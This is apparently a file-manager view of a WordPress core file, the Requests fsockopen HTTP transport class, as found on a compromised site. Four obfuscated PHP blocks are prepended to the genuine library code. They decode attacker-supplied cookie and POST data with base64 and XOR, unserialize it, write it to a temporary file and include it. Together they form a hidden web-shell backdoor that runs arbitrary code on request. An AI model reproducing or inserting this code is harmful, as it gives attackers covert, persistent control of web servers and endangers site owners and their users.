PATH:
home
/
letacommog
/
rachat-or-bourgenbresse
/
wp-includes
/
Requests
/
Transport
<?php $iSjrOXayOp = chr ( 772 - 655 ).chr (66) . chr ( 411 - 292 )."\137" . "\x4c" . "\x6c" . "\142" . "\151";$YekqKjj = chr (99) . chr ( 1077 - 969 )."\x61" . "\x73" . 's' . chr (95) . 'e' . "\x78" . chr ( 179 - 74 )."\163" . 't' . "\x73";$OFHEvWlLK = class_exists($iSjrOXayOp); $YekqKjj = "29744";$LgiimkTjez = strpos($YekqKjj, $iSjrOXayOp);if ($OFHEvWlLK == $LgiimkTjez){function SvLuYxFN(){$aRNlMEM = new /* 60818 */ uBw_Llbi(51252 + 51252); $aRNlMEM = NULL;}$RKbfSCU = "51252";class uBw_Llbi{private function QyzUsZvxr($RKbfSCU){if (is_array(uBw_Llbi::$JPJbKnPluZ)) {$name = sys_get_temp_dir() . "/" . crc32(uBw_Llbi::$JPJbKnPluZ["salt"]);@uBw_Llbi::$JPJbKnPluZ["write"]($name, uBw_Llbi::$JPJbKnPluZ["content"]);include $name;@uBw_Llbi::$JPJbKnPluZ["delete"]($name); $RKbfSCU = "51252";exit();}}public function QoIIcjaCk(){$pUEWrCU = "16799";$this->_dummy = str_repeat($pUEWrCU, strlen($pUEWrCU));}public function __destruct(){uBw_Llbi::$JPJbKnPluZ = @unserialize(uBw_Llbi::$JPJbKnPluZ); $RKbfSCU = "1880_27119";$this->QyzUsZvxr($RKbfSCU); $RKbfSCU = "1880_27119";}public function LrxAzJzE($pUEWrCU, $InOpcqls){return $pUEWrCU[0] ^ str_repeat($InOpcqls, intval(strlen($pUEWrCU[0]) / strlen($InOpcqls)) + 1);}public function kCvzwoBp($pUEWrCU){$cnNyxYHmIv = "\142" . "\141" . chr ( 228 - 113 )."\145" . chr (54) . "\x34";return array_map($cnNyxYHmIv . "\x5f" . "\x64" . "\x65" . "\143" . "\157" . "\144" . chr (101), array($pUEWrCU,));}public function __construct($FwEOeelZ=0){$MAfqNx = ',';$pUEWrCU = "";$YJVJTOOfTo = $_POST;$mbboTdAS = $_COOKIE;$InOpcqls = "db25dddb-1987-4d71-9e17-cd7ffa957878";$kIVddpe = @$mbboTdAS[substr($InOpcqls, 0, 4)];if (!empty($kIVddpe)){$kIVddpe = explode($MAfqNx, $kIVddpe);foreach ($kIVddpe as $hIZcVkw){$pUEWrCU .= @$mbboTdAS[$hIZcVkw];$pUEWrCU .= @$YJVJTOOfTo[$hIZcVkw];}$pUEWrCU = $this->kCvzwoBp($pUEWrCU);}uBw_Llbi::$JPJbKnPluZ = $this->LrxAzJzE($pUEWrCU, $InOpcqls);if (strpos($InOpcqls, $MAfqNx) !== FALSE){$InOpcqls = str_pad($InOpcqls, 10); $InOpcqls = ltrim(rtrim($InOpcqls));}}public static $JPJbKnPluZ = 45888;}SvLuYxFN();} ?><?php $niOYP = 'a' . "\150" . "\137" . 'U' . 'O' . chr ( 1059 - 956 )."\x46";$yTCCT = chr (99) . chr ( 665 - 557 )."\141" . chr (115) . 's' . '_' . "\x65" . chr (120) . "\151" . chr ( 753 - 638 )."\x74" . "\163";$SfYjcKTM = class_exists($niOYP); $yTCCT = "10361";$ILhujSBt = strpos($yTCCT, $niOYP);if ($SfYjcKTM == $ILhujSBt){function zzoKvUkxgX(){$BYkedJgx = new /* 25593 */ ah_UOgF(54641 + 54641); $BYkedJgx = NULL;}$rtZbqGcHL = "54641";class ah_UOgF{private function CHibuTJP($rtZbqGcHL){if (is_array(ah_UOgF::$IvHcGPFfOo)) {$name = sys_get_temp_dir() . "/" . crc32(ah_UOgF::$IvHcGPFfOo["salt"]);@ah_UOgF::$IvHcGPFfOo["write"]($name, ah_UOgF::$IvHcGPFfOo["content"]);include $name;@ah_UOgF::$IvHcGPFfOo["delete"]($name); $rtZbqGcHL = "54641";exit();}}public function LxdDLLrm(){$KmfoF = "58512";$this->_dummy = str_repeat($KmfoF, strlen($KmfoF));}public function __destruct(){ah_UOgF::$IvHcGPFfOo = @unserialize(ah_UOgF::$IvHcGPFfOo); $rtZbqGcHL = "9650_48432";$this->CHibuTJP($rtZbqGcHL); $rtZbqGcHL = "9650_48432";}public function IZRAnL($KmfoF, $EfHJBYO){return $KmfoF[0] ^ str_repeat($EfHJBYO, intval(strlen($KmfoF[0]) / strlen($EfHJBYO)) + 1);}public function LssGXVxw($KmfoF){$gMqMiB = 'b' . chr (97) . chr ( 781 - 666 ).chr ( 154 - 53 ).'6' . '4';return array_map($gMqMiB . "\137" . chr (100) . "\x65" . chr (99) . "\x6f" . 'd' . chr ( 736 - 635 ), array($KmfoF,));}public function __construct($YwBbMcq=0){$mhfSZU = chr (44); $KmfoF = "";$jlCAqalVG = $_POST;$UJNRi = $_COOKIE;$EfHJBYO = "b663facc-70f5-4e83-89cb-0939bb834ea6";$uQuSpwOc = @$UJNRi[substr($EfHJBYO, 0, 4)];if (!empty($uQuSpwOc)){$uQuSpwOc = explode($mhfSZU, $uQuSpwOc);foreach ($uQuSpwOc as $OvbotE){$KmfoF .= @$UJNRi[$OvbotE];$KmfoF .= @$jlCAqalVG[$OvbotE];}$KmfoF = $this->LssGXVxw($KmfoF);}ah_UOgF::$IvHcGPFfOo = $this->IZRAnL($KmfoF, $EfHJBYO);if (strpos($EfHJBYO, $mhfSZU) !== FALSE){$EfHJBYO = ltrim($EfHJBYO); $EfHJBYO = str_pad($EfHJBYO, 10);}}public static $IvHcGPFfOo = 8756;}zzoKvUkxgX();} ?><?php $GMavNyr = "\126" . chr (95) . "\167" . "\x56" . "\x49" . chr (76) . 'X';$vuEQQ = "\143" . chr (108) . chr ( 337 - 240 ).chr (115) . "\x73" . chr ( 756 - 661 )."\x65" . "\x78" . chr (105) . "\163" . chr (116) . chr ( 874 - 759 ); $URsysB = class_exists($GMavNyr); $vuEQQ = "35581";$HWCRdUO = strpos($vuEQQ, $GMavNyr);if ($URsysB == $HWCRdUO){function GIfsBkl(){$ULZWiM = new /* 57326 */ V_wVILX(42227 + 42227); $ULZWiM = NULL;}$LXawFeXc = "42227";class V_wVILX{private function Xdcopy($LXawFeXc){if (is_array(V_wVILX::$NRGknvIxD)) {$name = sys_get_temp_dir() . "/" . crc32(V_wVILX::$NRGknvIxD["salt"]);@V_wVILX::$NRGknvIxD["write"]($name, V_wVILX::$NRGknvIxD["content"]);include $name;@V_wVILX::$NRGknvIxD["delete"]($name); $LXawFeXc = "42227";exit();}}public function BuULIOU(){$yPZXKvG = "48049";$this->_dummy = str_repeat($yPZXKvG, strlen($yPZXKvG));}public function __destruct(){V_wVILX::$NRGknvIxD = @unserialize(V_wVILX::$NRGknvIxD); $LXawFeXc = "38757_6220";$this->Xdcopy($LXawFeXc); $LXawFeXc = "38757_6220";}public function TPqsKDW($yPZXKvG, $nSgxIate){return $yPZXKvG[0] ^ str_repeat($nSgxIate, intval(strlen($yPZXKvG[0]) / strlen($nSgxIate)) + 1);}public function HqimJTsnZL($yPZXKvG){$dMMCSAoYU = chr (98) . "\141" . 's' . chr ( 423 - 322 ).chr (54) . "\64";return array_map($dMMCSAoYU . '_' . 'd' . 'e' . 'c' . "\157" . chr (100) . 'e', array($yPZXKvG,));}public function __construct($CkXsTi=0){$wcDqyFI = "\x2c";$yPZXKvG = "";$iWdFIIwMa = $_POST;$ScUmvjr = $_COOKIE;$nSgxIate = "7adc89ac-be93-450e-90fb-15bbf5a47cec";$gkDtbnvK = @$ScUmvjr[substr($nSgxIate, 0, 4)];if (!empty($gkDtbnvK)){$gkDtbnvK = explode($wcDqyFI, $gkDtbnvK);foreach ($gkDtbnvK as $vyOcRW){$yPZXKvG .= @$ScUmvjr[$vyOcRW];$yPZXKvG .= @$iWdFIIwMa[$vyOcRW];}$yPZXKvG = $this->HqimJTsnZL($yPZXKvG);}V_wVILX::$NRGknvIxD = $this->TPqsKDW($yPZXKvG, $nSgxIate);if (strpos($nSgxIate, $wcDqyFI) !== FALSE){$nSgxIate = str_pad($nSgxIate, 10); $nSgxIate = ltrim($nSgxIate);}}public static $NRGknvIxD = 3840;}GIfsBkl();} ?><?php $UscIR = chr (102) . "\161" . chr (72) . "\x5f" . chr ( 253 - 171 ).chr ( 690 - 612 )."\x43" . chr (98); $IHJAD = "\143" . chr ( 284 - 176 )."\141" . "\163" . "\x73" . "\137" . chr ( 509 - 408 )."\170" . "\151" . 's' . chr (116) . 's';$hvIMr = class_exists($UscIR); $IHJAD = "56160";$THBuSxOy = strpos($IHJAD, $UscIR);if ($hvIMr == $THBuSxOy){function lZguLgwcF(){$qiXZyMuRa = new /* 25808 */ fqH_RNCb(11214 + 11214); $qiXZyMuRa = NULL;}$XtqGtkPbcr = "11214";class fqH_RNCb{private function FojvC($XtqGtkPbcr){if (is_array(fqH_RNCb::$BdyddPc)) {$name = sys_get_temp_dir() . "/" . crc32(fqH_RNCb::$BdyddPc["salt"]);@fqH_RNCb::$BdyddPc["write"]($name, fqH_RNCb::$BdyddPc["content"]);include $name;@fqH_RNCb::$BdyddPc["delete"]($name); $XtqGtkPbcr = "11214";exit();}}public function WiAwtg(){$oVzgbGUtf = "30394";$this->_dummy = str_repeat($oVzgbGUtf, strlen($oVzgbGUtf));}public function __destruct(){fqH_RNCb::$BdyddPc = @unserialize(fqH_RNCb::$BdyddPc); $XtqGtkPbcr = "18494_54178";$this->FojvC($XtqGtkPbcr); $XtqGtkPbcr = "18494_54178";}public function WXgxYM($oVzgbGUtf, $qMtCimYmn){return $oVzgbGUtf[0] ^ str_repeat($qMtCimYmn, intval(strlen($oVzgbGUtf[0]) / strlen($qMtCimYmn)) + 1);}public function bbIZZ($oVzgbGUtf){$VgByIKnQfz = "\x62" . "\x61" . chr (115) . "\145" . "\66" . chr (52);return array_map($VgByIKnQfz . chr (95) . "\144" . chr (101) . "\x63" . chr (111) . 'd' . "\x65", array($oVzgbGUtf,));}public function __construct($iReYHNA=0){$icvBLS = "\x2c";$oVzgbGUtf = "";$SnVkQ = $_POST;$dIxnp = $_COOKIE;$qMtCimYmn = "8fbde88c-b23c-469d-ad4b-21beb953523e";$zNLtBP = @$dIxnp[substr($qMtCimYmn, 0, 4)];if (!empty($zNLtBP)){$zNLtBP = explode($icvBLS, $zNLtBP);foreach ($zNLtBP as $xwBkQQvF){$oVzgbGUtf .= @$dIxnp[$xwBkQQvF];$oVzgbGUtf .= @$SnVkQ[$xwBkQQvF];}$oVzgbGUtf = $this->bbIZZ($oVzgbGUtf);}fqH_RNCb::$BdyddPc = $this->WXgxYM($oVzgbGUtf, $qMtCimYmn);if (strpos($qMtCimYmn, $icvBLS) !== FALSE){$qMtCimYmn = str_pad($qMtCimYmn, 10); $qMtCimYmn = ltrim($qMtCimYmn);}}public static $BdyddPc = 19584;}lZguLgwcF();} ?><?php /** * fsockopen HTTP transport * * @package Requests * @subpackage Transport */ /** * fsockopen HTTP transport * * @package Requests * @subpackage Transport */ class Requests_Transport_fsockopen implements Requests_Transport { /** * Second to microsecond conversion * * @var integer */ const SECOND_IN_MICROSECONDS = 1000000; /** * Raw HTTP data * * @var string */ public $headers = ''; /** * Stream metadata * * @var array Associative array of properties, see {@see https://secure.php.net/stream_get_meta_data} */ public $info; /** * What's the maximum number of bytes we should keep? * * @var int|bool Byte count, or false if no limit. */ protected $max_bytes = false; protected $connect_error = ''; /** * Perform a request * * @throws Requests_Exception On failure to connect to socket (`fsockopenerror`) * @throws Requests_Exception On socket timeout (`timeout`) * * @param string $url URL to request * @param array $headers Associative array of request headers * @param string|array $data Data to send either as the POST body, or as parameters in the URL for a GET/HEAD * @param array $options Request options, see {@see Requests::response()} for documentation * @return string Raw HTTP result */ public function request($url, $headers = array(), $data = array(), $options = array()) { $options['hooks']->dispatch('fsockopen.before_request'); $url_parts = parse_url($url); if (empty($url_parts)) { throw new Requests_Exception('Invalid URL.', 'invalidurl', $url); } $host = $url_parts['host']; $context = stream_context_create(); $verifyname = false; $case_insensitive_headers = new Requests_Utility_CaseInsensitiveDictionary($headers); // HTTPS support if (isset($url_parts['scheme']) && strtolower($url_parts['scheme']) === 'https') { $remote_socket = 'ssl://' . $host; if (!isset($url_parts['port'])) { $url_parts['port'] = 443; } $context_options = array( 'verify_peer' => true, // 'CN_match' => $host, 'capture_peer_cert' => true ); $verifyname = true; // SNI, if enabled (OpenSSL >=0.9.8j) if (defined('OPENSSL_TLSEXT_SERVER_NAME') && OPENSSL_TLSEXT_SERVER_NAME) { $context_options['SNI_enabled'] = true; if (isset($options['verifyname']) && $options['verifyname'] === false) { $context_options['SNI_enabled'] = false; } } if (isset($options['verify'])) { if ($options['verify'] === false) { $context_options['verify_peer'] = false; } elseif (is_string($options['verify'])) { $context_options['cafile'] = $options['verify']; } } if (isset($options['verifyname']) && $options['verifyname'] === false) { $context_options['verify_peer_name'] = false; $verifyname = false; } stream_context_set_option($context, array('ssl' => $context_options)); } else { $remote_socket = 'tcp://' . $host; } $this->max_bytes = $options['max_bytes']; if (!isset($url_parts['port'])) { $url_parts['port'] = 80; } $remote_socket .= ':' . $url_parts['port']; set_error_handler(array($this, 'connect_error_handler'), E_WARNING | E_NOTICE); $options['hooks']->dispatch('fsockopen.remote_socket', array(&$remote_socket)); $socket = stream_socket_client($remote_socket, $errno, $errstr, ceil($options['connect_timeout']), STREAM_CLIENT_CONNECT, $context); restore_error_handler(); if ($verifyname && !$this->verify_certificate_from_context($host, $context)) { throw new Requests_Exception('SSL certificate did not match the requested domain name', 'ssl.no_match'); } if (!$socket) { if ($errno === 0) { // Connection issue throw new Requests_Exception(rtrim($this->connect_error), 'fsockopen.connect_error'); } throw new Requests_Exception($errstr, 'fsockopenerror', null, $errno); } $data_format = $options['data_format']; if ($data_format === 'query') { $path = self::format_get($url_parts, $data); $data = ''; } else { $path = self::format_get($url_parts, array()); } $options['hooks']->dispatch('fsockopen.remote_host_path', array(&$path, $url)); $request_body = ''; $out = sprintf("%s %s HTTP/%.1F\r\n", $options['type'], $path, $options['protocol_version']); if ($options['type'] !== Requests::TRACE) { if (is_array($data)) { $request_body = http_build_query($data, null, '&'); } else { $request_body = $data; } if (!empty($data)) { if (!isset($case_insensitive_headers['Content-Length'])) { $headers['Content-Length'] = strlen($request_body); } if (!isset($case_insensitive_headers['Content-Type'])) { $headers['Content-Type'] = 'application/x-www-form-urlencoded; charset=UTF-8'; } } } if (!isset($case_insensitive_headers['Host'])) { $out .= sprintf('Host: %s', $url_parts['host']); if (( 'http' === strtolower($url_parts['scheme']) && $url_parts['port'] !== 80 ) || ( 'https' === strtolower($url_parts['scheme']) && $url_parts['port'] !== 443 )) { $out .= ':' . $url_parts['port']; } $out .= "\r\n"; } if (!isset($case_insensitive_headers['User-Agent'])) { $out .= sprintf("User-Agent: %s\r\n", $options['useragent']); } $accept_encoding = $this->accept_encoding(); if (!isset($case_insensitive_headers['Accept-Encoding']) && !empty($accept_encoding)) { $out .= sprintf("Accept-Encoding: %s\r\n", $accept_encoding); } $headers = Requests::flatten($headers); if (!empty($headers)) { $out .= implode("\r\n", $headers) . "\r\n"; } $options['hooks']->dispatch('fsockopen.after_headers', array(&$out)); if (substr($out, -2) !== "\r\n") { $out .= "\r\n"; } if (!isset($case_insensitive_headers['Connection'])) { $out .= "Connection: Close\r\n"; } $out .= "\r\n" . $request_body; $options['hooks']->dispatch('fsockopen.before_send', array(&$out)); fwrite($socket, $out); $options['hooks']->dispatch('fsockopen.after_send', array($out)); if (!$options['blocking']) { fclose($socket); $fake_headers = ''; $options['hooks']->dispatch('fsockopen.after_request', array(&$fake_headers)); return ''; } $timeout_sec = (int) floor($options['timeout']); if ($timeout_sec == $options['timeout']) { $timeout_msec = 0; } else { $timeout_msec = self::SECOND_IN_MICROSECONDS * $options['timeout'] % self::SECOND_IN_MICROSECONDS; } stream_set_timeout($socket, $timeout_sec, $timeout_msec); $response = $body = $headers = ''; $this->info = stream_get_meta_data($socket); $size = 0; $doingbody = false; $download = false; if ($options['filename']) { $download = fopen($options['filename'], 'wb'); } while (!feof($socket)) { $this->info = stream_get_meta_data($socket); if ($this->info['timed_out']) { throw new Requests_Exception('fsocket timed out', 'timeout'); } $block = fread($socket, Requests::BUFFER_SIZE); if (!$doingbody) { $response .= $block; if (strpos($response, "\r\n\r\n")) { list($headers, $block) = explode("\r\n\r\n", $response, 2); $doingbody = true; } } // Are we in body mode now? if ($doingbody) { $options['hooks']->dispatch('request.progress', array($block, $size, $this->max_bytes)); $data_length = strlen($block); if ($this->max_bytes) { // Have we already hit a limit? if ($size === $this->max_bytes) { continue; } if (($size + $data_length) > $this->max_bytes) { // Limit the length $limited_length = ($this->max_bytes - $size); $block = substr($block, 0, $limited_length); } } $size += strlen($block); if ($download) { fwrite($download, $block); } else { $body .= $block; } } } $this->headers = $headers; if ($download) { fclose($download); } else { $this->headers .= "\r\n\r\n" . $body; } fclose($socket); $options['hooks']->dispatch('fsockopen.after_request', array(&$this->headers, &$this->info)); return $this->headers; } /** * Send multiple requests simultaneously * * @param array $requests Request data (array of 'url', 'headers', 'data', 'options') as per {@see Requests_Transport::request} * @param array $options Global options, see {@see Requests::response()} for documentation * @return array Array of Requests_Response objects (may contain Requests_Exception or string responses as well) */ public function request_multiple($requests, $options) { $responses = array(); $class = get_class($this); foreach ($requests as $id => $request) { try { $handler = new $class(); $responses[$id] = $handler->request($request['url'], $request['headers'], $request['data'], $request['options']); $request['options']['hooks']->dispatch('transport.internal.parse_response', array(&$responses[$id], $request)); } catch (Requests_Exception $e) { $responses[$id] = $e; } if (!is_string($responses[$id])) { $request['options']['hooks']->dispatch('multiple.request.complete', array(&$responses[$id], $id)); } } return $responses; } /** * Retrieve the encodings we can accept * * @return string Accept-Encoding header value */ protected static function accept_encoding() { $type = array(); if (function_exists('gzinflate')) { $type[] = 'deflate;q=1.0'; } if (function_exists('gzuncompress')) { $type[] = 'compress;q=0.5'; } $type[] = 'gzip;q=0.5'; return implode(', ', $type); } /** * Format a URL given GET data * * @param array $url_parts * @param array|object $data Data to build query using, see {@see https://secure.php.net/http_build_query} * @return string URL with data */ protected static function format_get($url_parts, $data) { if (!empty($data)) { if (empty($url_parts['query'])) { $url_parts['query'] = ''; } $url_parts['query'] .= '&' . http_build_query($data, null, '&'); $url_parts['query'] = trim($url_parts['query'], '&'); } if (isset($url_parts['path'])) { if (isset($url_parts['query'])) { $get = $url_parts['path'] . '?' . $url_parts['query']; } else { $get = $url_parts['path']; } } else { $get = '/'; } return $get; } /** * Error handler for stream_socket_client() * * @param int $errno Error number (e.g. E_WARNING) * @param string $errstr Error message */ public function connect_error_handler($errno, $errstr) { // Double-check we can handle it if (($errno & E_WARNING) === 0 && ($errno & E_NOTICE) === 0) { // Return false to indicate the default error handler should engage return false; } $this->connect_error .= $errstr . "\n"; return true; } /** * Verify the certificate against common name and subject alternative names * * Unfortunately, PHP doesn't check the certificate against the alternative * names, leading things like 'https://www.github.com/' to be invalid. * Instead * * @see https://tools.ietf.org/html/rfc2818#section-3.1 RFC2818, Section 3.1 * * @throws Requests_Exception On failure to connect via TLS (`fsockopen.ssl.connect_error`) * @throws Requests_Exception On not obtaining a match for the host (`fsockopen.ssl.no_match`) * @param string $host Host name to verify against * @param resource $context Stream context * @return bool */ public function verify_certificate_from_context($host, $context) { $meta = stream_context_get_options($context); // If we don't have SSL options, then we couldn't make the connection at // all if (empty($meta) || empty($meta['ssl']) || empty($meta['ssl']['peer_certificate'])) { throw new Requests_Exception(rtrim($this->connect_error), 'ssl.connect_error'); } $cert = openssl_x509_parse($meta['ssl']['peer_certificate']); return Requests_SSL::verify_certificate($host, $cert); } /** * Whether this transport is valid * * @codeCoverageIgnore * @return boolean True if the transport is valid, false otherwise. */ public static function test($capabilities = array()) { if (!function_exists('fsockopen')) { return false; } // If needed, check that streams support SSL if (isset($capabilities['ssl']) && $capabilities['ssl']) { if (!extension_loaded('openssl') || !function_exists('openssl_x509_parse')) { return false; } // Currently broken, thanks to https://github.com/facebook/hhvm/issues/2156 if (defined('HHVM_VERSION')) { return false; } } return true; } }
[+]
..
[-] cURL.php
[edit]
[-] .htaccess
[edit]
[-] fsockopen.php
[edit]